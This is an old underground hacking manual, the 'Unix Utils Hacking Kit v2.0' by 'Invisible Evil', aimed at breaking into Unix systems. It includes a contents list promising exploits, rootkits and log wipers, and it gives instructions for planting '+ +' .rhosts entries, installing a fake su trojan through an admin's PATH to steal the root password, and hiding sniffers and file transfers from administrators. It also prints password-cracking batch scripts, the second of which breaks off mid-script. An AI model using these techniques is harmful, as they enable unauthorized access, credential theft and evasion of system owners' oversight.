VERY comprehensive and includes plenty of C code and basic rootkits.
e287e18e77214fb812feb1e6c65448b120769b4bdebc15bd92a909bd21f7b9ce
THIS PAPER CONTAINS .C CODE - MAKE SURE TO TURN WORD WRAP OFF! In your editor!!
AND DO NOT SAVE ANY CHANGES TO THIS FILE IF ASKED....
Unix Utils
Linux/BSD/SySV/SunOS/IRIX/AIX/HP-UX
Hacking Kit v1.0.c Jan/97
Hacking Kit v2.0.b March/97 (this is an update)
By: Invisible Evil
IRC: #unixhacking #virus #hackers #virii #hacking #hacker
#hack is just to busy for me ;)
NICK: i-e
If you have any other exploits, bugs, sniffers or utils that are not in here
please mail them to ii@dormroom.pyro.net. And I will be sure to keep you
updated with the latest version of this toolkit.
Comments are welcome. Sys admin's that want to keep their system clean are
welcome to request the latest version.
If you are looking for perfect grammar or spelling please put this file in
your circular file. I put enough time into this and just put it through
a cheap spell check.
Whats new? Look for more info on tricks of the trade, and nfs mounting
drives to gain access to shells. I am sure you will like the additions.
I have added a login trojan, in.telnetd trojan, and some more scripts for
scanning machines for mountable drives. Have pun!
I will add a (*) to u p d a t e d s e c t i o n s.
Contents:
Disclaimer
Preface
Chapter I - Unix commands you need to know
1A. Basic commands
Getting back to your home directory
getting into a user home directory easy
how to see what directory you are in now
How to get a complete manual for each command
1B. Telnet
Unix file permissions
Unix groups
How to change permissions and groups
1C. Rlogin
.rhosts
How to setup a .rhost file to login without a password
1D. FTP
Logging in to the site, but never out of the site.
Using prompt, hash, and, bin
Using get, put, mget, and, mput
1E. GCC (unix compiler)
How to get the file to the hack box without uploading it
How to copy files to your home directory easy
How to compile .c programs
How to name them what you want
How to load programs in the background while you log off
Looking at your process with ps
Chapter II - Getting started (your first account)
2A. Cracking password files
How to get hundreds of accounts with your first hacked account
Why you only really need one password cracked on a system
How to get the root password from the admin, on an non-exploit system
Using A fake su program
Doc's for the fake su program
How to find the admin's
How to read .bash_history
Cracker Jack - A good password cracker
How to use crackerjack
Word Files
What you will need to get started
Hashing the word files
* Hash file for use with cracker jack and your word list
* Hash file for use with cracker jack and your passwd file
2B. Talking to newbe's
How to find the newbe's
How to get the newbe's passwords
2C. The hard way
Using finger @
What could the password be?
Getting more info from finger
a small .c file to use if you get on
Writing a small perl script to do the work for you.
How to get a domain list of all domains from rs.internic.net
A perl script to rip the domains & put them in a sorted readable list
How to execute the perl script
* 2D. Using mount to gain access to unix systems
* What is nfs mount
* What you need to get started
* How to check a system to see if you can mount their drives
* A script to scan for systems that are nfs mountable
* How to mount the system
* How to unmount the system
* A Live Demo
* Mounting the drive
* Viewing the user directories
* Editing the local machine's passwd file
* How to put a .rhosts file in one on thier users directories
* How to rlogin to the users account
Chapter III - Getting password files
3A. PHF
What is phf
Using lynx or netscape to access phf
Finding the user id the victims httpd (www) is running under
How to see if you are root using phf
How to cat the password file using phf
Backing up the victims password file
Changing a users password using phf
Restoring the old passwords
A .c file that will let you pipe commands to phf from your shell
How to use the phf shell file
Another way to use phf - text by quantum
Quantum's bindwarez file
A perl script that will try EVERY domain on the internet and log
root access and snatch passwd files for you all day in the background.
Doc's for the pearl script above
Getting accounts from /var/?/messages
A script to get the passwords for you if you can access /var/?/messages
3B. Newbe's
Lammer's
3C. Getting shadow passwd files
What is a shadow passwd
Getting the shadow file without root access
A .c file to cat any file without root access
3D. Getting /etc/hosts
Why get /etc/hosts
Chapter IV - Getting the root account
What to do if you can't get root on the system
4A. Bugs
Intro
4B. Exploits
The umount/mount exploit
What are SUID perm's
The umount .c file
How to compile umount.c
The lpr Linux exploit
The lpr Linux .c exploit file
The lpr BSD .c exploit file
How to use lpr
Watch the group owners with lpr
Just use lpr for first root, then make a SUID shell
How to make the SUID root shell for future root access (root root)
The splitvt exploit
The splitvt exploit .c program
How to use the splitvt exploit program
The sendmail 8.73 - 8.83 root exploit shell script
How to use the sendmail exploit to get root access
Chapter V - Making yourself invisible
Keeping access
5A. Zap2 (for wtmp/lastlog/utmp)
Fingering the host before login
How to login and stay safe
How to configure Zap2
Finding the log file locations
The zap.c file
5B. Other scripts
The wted wtmp editor
Command line usage for wted
How to chmod the wtmp.tmp file
How to copy the wtmp.tmp to the wtmp file
Setting the path for the wtmp file in wted
The wted.c file
Cleaning the lastlog file using lled
Command line options for lled
How to use lled
How to chmod the lastlog.tmp file
How to copy the lastlog.tmp file to lastlog
Setting the path for the lastlog file in lled
The lled.c file
* A good perl script for editing wtmp, utmp, and, checking processes
Chapter VI - Cleaning the log files
6A. A walk around in a hacked system - let's login
Logging on the system
Watching for admin's
Nested directories
Having your root file ready
Becoming invisible
Greping the log directory
Cleaning the logs
Lets sniff the network
Editing your linsniffer.c
Looking at the processes running
Compiling and naming your sniffer program
Starting a sniff session
Changing group file access
Making a suid root shell trojan for uid=0 gid=0 every time
Naming your trojan
Touching the files date
Checking the sniffer log file
Setting the history files to null
* Using unset for the history files
6B. messages and the syslog
How to find the logs are by reading /etc/syslog.conf
How to see if there are logs in hidden directories
How to see if logs are being mailed to user accounts
How to see if logs are going to another machine
* How to edit syslog.conf to hide logins
* Restarting syslogd
How to see if there is a secret su log by reading /etc/login.defs
6C. The xferlog
How to edit the xferlog
How to grep and edit the www logs
How to look for ftp logs
* Other ways to edit text logs
* Using grep -v
* A script to rip text lines from these logs
* Restarting syslogd
6D. The crontabs
How to find and read the root or admin's cron
How to see if MD5 is setup on the machine
What is MD5
Chapter VII - Keeping access to the machine
7A. Tricks of the trade
When the system admin has found you out
What to expect from the admin
History files
Nested directories
Placing trojans
Hidden directories
Making new commands (trojans)
Adding or changing passwd file entry's
Setting some admin accounts with null passwords
The best way to add an account
Editing a null account so you can login
Installing more games or exploitable programs
How to know your admin's
Reading system mail (with out updating pointers)
What to look for in the mail directories
A program to read mail without updating pointers
7B. Root kits and trojans
What are root kits
What are Demon kits
What do trojans do
*********************************************************
* Appendix I - Things to do after access *
*********************************************************
The a-z checklist
*********************************************************
* Appendix II - Hacking / Security WWW / ftp sites *
*********************************************************
*********************************************************
* Appendix III - More exploits for root or other access *
*********************************************************
A3-01. Vixie crontab buffer overflow for RedHat Linux
A3-02. Root dip exploit
A3-03. ldt - text by quantumg
A3-04. suid perl - text by quantumg
A3-05. Abuse Sendmail 8.6.9
A3-06. ttysurf - grab someone's tty
A3-07. shadow.c - Get shadow passwd files
A3-08. Abuse Root Exploit (linux game program)
A3-09. Doom (game) root exploit - makes suid root shell
A3-10. dosmenu suid root exploit
A3-11. Doom root killmouse exploit
A3-12. Root exploit for resize icons
A3-13. Root console exploit for restorefont
A3-14. Root rxvt X server exploit
A3-15. Root wuftpd exploit
A3-16. A shell script called gimme, used to read any system file
*********************************************************
* Appendix IV - Other UNIX system utilities *
*********************************************************
A4-01. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX
A4-02. invisible.c Makes you invisible, and works on some SunOS without root
A4-03. SySV Program that makes you invisible
A4-04. UNIX Port scanner
A4-05. Remove wtmp entries by tty number or username
A4-06. SunOS wtmp editor
A4-07. SunOS 4+ Zap your self from wtmp, utmp and lastlog
*********************************************************
* Appendix V - Other Unix Exploits *
*********************************************************
A5-01. HP-UX Root vhe_u_mnt exploit
A5-02. IRIX Root mail exploit
A5-03. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX
A5-04. IRIX mail exploit to make you any user on the machine - BUT NOT root
A5-05. BSD - crontab root exploit
*********************************************************
* Appendix VI - UUENCODED FILES *
*********************************************************
1. Quantum's Bindwarez binary file for PHF
2. Demon Root Kit - Includes: Banish, DemonPing, DemonSu, DemonTelnet
3. Linux Root Kit - Includes: Login, Netstat, and, PS
4. The Fake SU Program
**********
Disclaimer
**********
True this manual will aid hackers into breaking into systems but it is also
provided to guide system admin's on different security problems and help
with things to watch for on their system to keep hackers off.
If you use this manual to gain access to any system where you do not belong,
and do any type of damage, you alone will suffer for your stupid actions!
I am not telling you to break into any system, I am just showing some of
my experience, and things that I would do if I was to break into my own system.
This is for information only.....
ISP's Secure Your Systems!
*******
Preface
*******
Ok, lets get started. If you are going to hack, you must be doing this for a
reason. All hackers have their reasons for doing what they do. Most are just
hungry to learn. Most of what I have learned about unix, i have learned on
some service providers or someone else's machine. I am one for the 'hands on'
experience. There is much to learn and you would have to read 20,000 books
just to get what you would learn out of a few config files, a few admin email
messages, some .bash_history files, and some poking around a few systems.
Here in this manual you should learn how to be the 'complete hacker' and come
up with a style of your own. It will not take to long, but it will take some
practice and experience before you will be able to call yourself a hacker.
Not just anyone that can crack a password file, and log into a unix machine
can call themselves a hacker. Ok, you can get root access to a box! You still
are not a hacker! You need to know why you are a hacker first, and then have
your 'code' and 'style'. You need a purpose and a reason for hacking into any
box. The true hacker knows why he is doing what he does, and is doing it for
reasons like knowledge, free information, and ACCESS. The true hacker will
turn one hack into access to many different systems and providers and keep this
access for future learning and more FREE information.
The wan-a-be hacker will not be invisible, and will do many stupid things like:
delete or corrupt data, down the machine, run bots or irc clients from root
accounts or machines Give the passwords he cracked to everyone in the world
to prove they can hack. Or they might just do stupid things that will get
themselves cought. I think sometimes this is done purposely just to draw
attention to themselves so they can get cought and make the announcement that
they are a hacker, and they were here! A real hacker needs no such glory,
he just needs the access and wants to keep it and be invisible! He will not
tell many friends about the system, he will not give out the passwords or
accounts, he will keep others off so he can continue his access there and
keep it clean.
Here in this manual i hope that i can add enough style so that you can have
real heart in this matter and and be a good clean hacker.
Happy hacking ...
--------------------------------
Chapter I
Unix commands you need to know.
--------------------------------
There are just a few basic commands you need to learn, and then some unix
programs that will aid you in logging in logging into or keeping access to
the machine.
Call your local internet service provider and ask them to sell you a shell
account so that you will have something to practice on to learn these
basic commands. The average shell account might cost you $10.00 per month
if you don't already get one with your existing account.
--------------
Section 1A
Basic commands
--------------
I hope you have a basic knowledge of DOS, that would help a bit, and I will
assume that you already do in writing this manual.
DOS Commands you are used to first:
REMEMBER: unix is case sensitive, so if I here use lower case you must also,
if I use a space you must also. DOS will let you get away with allot of things
but unix will not!
DIR/W = ls
DIR = ls -l
DIR/AH = ls -al AH=(hidden) -al=(include hidden files as well as regular)
RENAME = mv
ATTRIB = chmod
MD = mkdir
RD = rmdir
DEL = rm
COPY = cp
These are the basic commands, i suggest that you lookup the man pages
on each one of these commands from your unix shell. You would do this by
typing 'man command' without the ''.
each one of these commands will have switches for them, like cp -R to copy
files and directories. So you would type man cp to get all of the switches
you can use with the copy command.
cd {then press enter} will always take you to your home directory
cp filename $HOME will copy the file to your home directory
cd ~username will take you to that users home dir if you have access to be
there
pwd {press enter} will show you what directory you are in.
-------------
Section 1B
Telnet
-------------
Telnet is a command that you can use from a shell account, or from an exe
file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems
that will let you connect to another machine on the net. There are other
programs you will learn about here like FTP, and rlogin that you can use as well
but now we will use telnet.
You can use telnet if you know the IP address or the host name you want to
connect or login to. To use the command you would just use the telnet program
to connect to the IP or host like this:
Telnet netcom.com or telnet 206.146.43.56
Ok, now lets login:
telnet machine.com
trying .....
Connected to machine.com
Linux 2.0.28 (machine.com) (ttyp0)
machine login:username
password:#######
bash$
Your prompt might look different, but we will use this one.
Notice above that it will tell you the O/S when you get the login prompt.
You can use this if you get a large collection of passwd files. Even before
going on to crack them sort them by O/S types by just telnet-ing to them to
see what they are running. There are other ways, but lets keep this telnet
topic going for a sec... telnet domain.name.com, after you see what they are
running make a note of this and ctrl ] to break out of the connection.
Put all of your linux passwd files into a pile to be cracked first. All we
need is one account that works for the system, and we can be almost sure
we will have root on that machine! There are way to many holes in linux to
think we will not be able to own one of those machines, so lets get to work so
we can start this wonderful world of hacking.
----------------------
Unix File Permissions
----------------------
bash$
bash$ cd /tmp
bash$ ls -l
total 783
-rwx------ 1 wood users 1 Jan 25 18:28 19067haa
-rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428
-rw------- 1 rhey19 root 395447 Jan 24 02:59 pop3a13598
-rw------- 1 rhey19 root 395447 Jan 24 03:00 pop3a13600
drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens
First notice that we used a / and not \ to change to the tmp directory! Unix
uses the / as the root so it is backwards from DOS here.
Notice we did ls -l for the long directory. If we did 'ls' we would have what
you see below.
bash$ ls
19067haa filter.14428 pop3a13598 pop3a13600 screens
With what we see here can not tell much, so most of the time we will be
using ls -al with the -al we will see the hidden files also, hidden
files and directories will always start with a '.'. Now watch:
bash$ ls -al
total 794
drwxrwxrwt 4 root root 8192 Jan 25 23:05 .
drwxr-xr-x 22 root root 1024 Dec 28 18:07 ..
-rw-r--r-- 1 berry users 6 Jan 25 23:05 .pinetemp.000
drwxr-xr-x 2 berry users 1024 Jan 25 23:05 .test
-rwx------ 1 wood users 1 Jan 25 18:28 19067haa
-rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428
-rw------- 1 rhey19 root 395447 Jan 24 02:59 pop3a13598
-rw------- 1 rhey19 root 395447 Jan 24 03:00 pop3a13600
drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens
.pinetemp.000 is a hidden file, and .test is a hidden directory.
-rw-r--r-- 1 berry mail 1 Jan 16 12:38 filter.14428
row 1 row2 row3
----------------------------
Now here we need to learn about permissions, users, and groups.
Row #1 is the file permissions
Row #2 is who owns the file
Row #3 is the group owner of the file
File permissions are grouped together into three different groups.
If the line starts with a d, it is a directory, if there is no d, it is a file.
- --- --- ---
| | | |--------> Other = anyone on the machine can access
| | |------------> Group = certain groups can access
| |----------------> User = only the owner can access
|------------------> Directory Mark
- rw- r-- r--
| | | |--------> Other can only read the file
| | |------------> Group can only read the file
| |----------------> User can read or write to the file
|------------------> It is not a directory
- rwx rwx r-x
| | | |--------> Other can read and execute the file
| | |------------> Group can read write and execute the file
| |----------------> User can read write and execute the file
|------------------> It is not a directory
The owner is the user name in row #2 and the group owner is the name in row #3.
In DOS the file has to have a .exe, .com, or .bat extension to execute, but in
unix all you need is the --x in your group of user, other, group
You can change these permissions if you own the file or have root access:
---------------------------------------------------------------------------
chmod oug+r filename will make all three groups of permissions be able to
read the file.
chmod og-r filename would make the file readable only to the user that owns
the file. (notice the - or + to set the file yes or no)
chmod +x filename would make the file execute by all.
chown username filename would make the file owned by another user.
chgrp groupname filename would make the file owned by another group.
---------------------------------------------------------------------------
Make sure to keep file perm's and groups the same or you will be sniffed
out and booted from the system. Changing configs on the system might only
break other functions, so keep your paws off or you are just asking to get
cought. Only do what you are *SURE* of. Only use commands that you know,
you might find yourself spending hours fixing just one typo like
chown -R username /* could keep you busy for a year ;)
Just be careful!
We will get into this stuff more as we go into the needs for this.
------------------
Section 1C Rlogin
------------------
There is another command you might use and we will get into this elsewhere
as we get into using rlogin to login to a system without a password.
For now read the man pages on rlogin by using the man rlogin from your
shell account.
The basic command would be :
rlogin -l username hostname
connecting....
password:
bash$
Rlogin requires the user to have a file in their home directory that tells
what system they can receive the rlogin from. In this file .rhosts it would
look like this:
username hostname (or) hostname
if you were to add to this file + + it would let any user from any host
login without a password.
The file would look like this:
----- cut here ------
+ +
_____ cut here ------
if they already had entry's you could add the + + under their host names, but
remember now they would notice seeing they would now be able to rlogin
without the password. You would be targeting people that did not
already have a .rhosts file.
---------------
Section 1D FTP
---------------
Another way to login will be FTP. You can use a windows client, or just
login from a shell.
ftp ftp.domain.com
This will allow you to download or upload files to the site you are hacking.
Just make sure to edit the xferlog (see section 6d) to wipe your tracks
on the system. Remember NEVER to ftp or telnet out of the hacked system, only
log into it! If you are coming from your own system, or from another hacked
account you might just be giving your login and password to the system admin
or another hacker on their system. There could be a telnetd or ftpd trojan
loaded on the system, or even a sniffer. Now you would have just gave someone
your login id and password. And if this was the system admin, he might have
the idea that revenge is sweet ;)
Using ftp from the shell, I would suggest using a few commands:
After you login, and have your prompt, type these commands
pressing enter after each one.
prompt
hash
bin
prompt will allow you to type a command like (mget *) or (mput*) and transfer
an entire directory without having it prompt you for each file yes or no.
hash marks
hash will put ############ on the screen so you can see the transfer
is still moving and at what speed.
bin will make sure you get the files in the right mode, and if transferring
binary files, you will be sure they will uncompresses.
The transfer commands are easy, get filename, or, put filename, or for many
files you can use regular wild cards with mput or mget.
--------------------
Section 1E
GCC compiler
--------------------
There will be a time when you will need to compile a .c file.
It is best to compile on the machine you are working on. So upload or copy
and past the files to the hacked box and compile them there. If you have
problems with their compiler you can try to upload pre-compiled files.
One way to get the file up to the victims machine would be to use copy
and paste. Get a good tsr or windows shareware program to do this if
you do not have any way to do it now. You can copy a script file from
one window and paste it into an editor on the victims machine, and then compile
the new file. Walaa... no upload log of the file. You can copy and paste
from the victims machine as well so that there are no download logs of ascii
files.
To copy and paste you can just open an editor on the hacked box, and then copy
from your other session, and paste your script into the editor and save the
file. This way there will not be anything in the xferlog yet.
You can do the same thing with the password file. If you do decide to
download the password file using ftp, make sure to copy it to your home
directory first under a different name.
bash:/etc:> cp passwd $HOME/plog would copy the file called passwd from the /etc
directory you were in, to your home directory in a file called plog instead of
passwd. Admin's grep the xfer logs looking for who is downloading the passwd
file.
Another way to get file to or from the box without showing up in the logs
would be to open an irc session on the victims machine, then from your other
session where you are already a user on irc, send the files using dcc.
The command to send the files would be /dcc send <nick> <filename>
The command to get the file on the other side would be /dcc get <nick> <file>
It would be nice if you had a bot loaded on the irc when you were hacking so
that you could just send files to the bot and have it auto receive them.
A 'bot' is a robot program that you can load in the background on your shell
account that will receive files, keep channels open, etc...
The GCC compiler is easy...
gcc filename.c -o filenameyouwant
If i was to compile a file called z2.c that would zap the log files i would
type this:
gcc z2.c -o zap
This would give me a file that would exe, called zap
If I just typed : gcc z2.c I would have a file named a.out, that was the executable
file and would have to rename it to zap, or some name i would know by doing
this: mv a.out zap
Now I would have a file named zap that was executable instead of a.out.
You will want to make sure you are not naming these files names that sys admin's
will know. If you had a sniffer file called 'linuxsniffer.c' you don't
want to keep the same name ;) call it something like:
gcc linuxsniffer.c -o lsn
Remember also sometimes you can execute these files names right in the directory
by just typing the file name like for our 'lsn' (sniffer) above just by
typing lsn. But sometimes this will not work unless you add a ./ to the
command. So remember, sometimes you will need to type ./lsn or your file
name.
Also there will be a time you will want a program to run in the background
even after you logoff. Like in the case of the sniffer above. In this case
you might want to name your sniffer something that would not be so easy
noticed. Use your own style here. BUT to make it stay in the background while
you are off the system you need to run the command with a & after the command.
lsn&
If you were to just type lsn, your screen would pause, and you would not be
able to type while the program was sniffing, but if you typed lsn& it would
load and the system prompt would come right back to you. Also the system
would let you know it was loaded by giving you the process id # that it
was loaded as.
You could view the process with the ps -x command, you might want to run
ps -auxe |more
a= all
u= show user
x= yours
e= env
some machines
f=tree
or command: pstree
------------------------------------
Chapter II
Getting started (your first account)
------------------------------------
There are many ways to get a starter account. I will go into each area to
help you get started. All you need is one good account to spawn off to
hundreds of accounts. Think of this; You get one good exploitable system,
most any linux machine ;)
Now you get root access and load a sniffer program. The TCP sniffer will
search out any login process on the network and log the login and password
for any telnet, ftp, or dial-in session going out or coming into the system.
Now even if it is a small ethernet connection you have around 100 passwords
for a few machines or domains. If a larger net provider you have hundreds
of accounts all over the world! All you need for this is one good account
and password to an exploitable system. If it seems you can not exploit
root on the system, this might be a good system to crack passwords on and
exchange the accounts for other accounts from hackers or irc users that are
looking to load a bot but do nt have the shell account or disk space to do
it. NEVER give out even one password to a system you exploited root on.
Keep these systems to yourself!
Lets now get into ways to get your first accounts.
------------------------
Section 2A.
Cracking passwd files
------------------------
If you are hacking with the right frame of mind, you will run the crack
program until you get one good account that will let you into the system.
You will login and see if you can exploit root on the system, if so, get root,
get the files you need to use into your nested directory, and erase your
presence, and clean all of the logs. Now you are ready to load your sniffer.
Why go on hacking passwords for a system that within 24 hours you will have
most of the passwords anyway? Not only for the machine you just hacked, but
other machines that were connected to as well. If the system is not
exploitable don't even waste your time on it, go on to the next. At a latter
date if you want to crack passwords for accounts to trade go ahead.
If you get an admin's account cracked you might want to read his history files,
and see if he is using the su command to access root allot. If he is you can
use an su trojan on him. This will get you the root password. This works like
this: You change his shell script so that a hidden directory (.term) is good,
is set in the search path before all other directories. You put a fake su
binary in the .term (or other) directory. He types su, everything looks good
to him, he types in the root password when prompted, the password id copied to
a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a
password error telling him to try again. He thinks he must have done something
wrong and runs su again, but this time the real one and logs in.
You will find this fake su program in the last appendix named uuencoded files.
Here are the docs:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1. Change the path in one of the user accounts that you have access to that
you see is using SU from reading their history files, to hit a path first
that you have placed the su trojan file into. .term or .elm is good!
2. Make sure to edit the top of the su.c file to the path you will be using
so that the sutrojan will delete isself and let the real SU work for the
second try.
3. Put all of the files in the target directory and compile the su.c file.
gcc su.c -o su
Then delete all of the files but the su. All done!
.bash_profile might look like this:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin
When the sys admin run's 'SU' it will run the SU-trojan in the .term
directory first and report that the password he typed was wrong, the
Trojan su program would have put a hidden file in the /tmp directory for
you that contains the root password (or account passwd) typed. If it was
an account rather then the root password it will let you know the account
name. Then the trojan su program deletes itself so that the next try will
get the real su program.
You can find the admin's at the top section of the passwd file in the /etc
directory. Just type : more passwd
You can be sure that the first two real accounts made in the passwd file are
admin's, also sometimes you can find others by where their directories are
located in the password file. Like /staff/username.
The history files are in each users account directory. You can read these to
see what the last commands were that were typed by the user. Sometimes as
much as the last 100+ commands. Look for the file .bash_history, or History,
you can read these using more. command: more .bash_history, or most times to
keep your typing you can type : more .b* (or) just type : more .b (and then
hit the tab key on your keyboard).
Ok so now you need a good password cracking program. You can see in the next
chapter on how to get password files from systems that you do not have an
account on, but it is catch 22, you need the password cracking program too.
There are three things that you will need.
1. Password cracking program
2. Good word files
3. Password files
The best password cracking program to start would be crackerjack. You can
search the web and find this easy as 1,2,3. Download it and you are ready
to go. If you are a bit more advanced you can download a cjack for unix and run
it in a shell. But if you are just getting started get the DOS/OS/2 version.
Also search for some good word files. The best word files are the names.
You will find that most unsecured passwords out there are guy's girlfriends
names, of girls boyfriends names ;) You will find word files like
'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
hackersdict' and other like these to be the best.
Load crackerjack like this:
[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
Like above run the password file as the wordfile first. This will get you all
of the logon's first that used their login name as their password, also if they
used any other info like their real name or company name it will hit right away
and you will not have to wait for the program to search through a word file.
If you want to hash the word file to get more out of it you can read the doc's
for crackerjack.
Hashing is where you can tell crackerjack to change the case of the wordfile
or even add numbers or letters to the beginning or end of the words in the word
file, like sandy1 or 1sandy. You will find that many users do this and think
they are more secure.
Here are hashing files for both the passwd file and your word list. After
looking these over you will see how you can modify these or create new ones
to suit your needs.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
---------------- end of dicthash.bat
---------------- start of jackhash.bat
@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
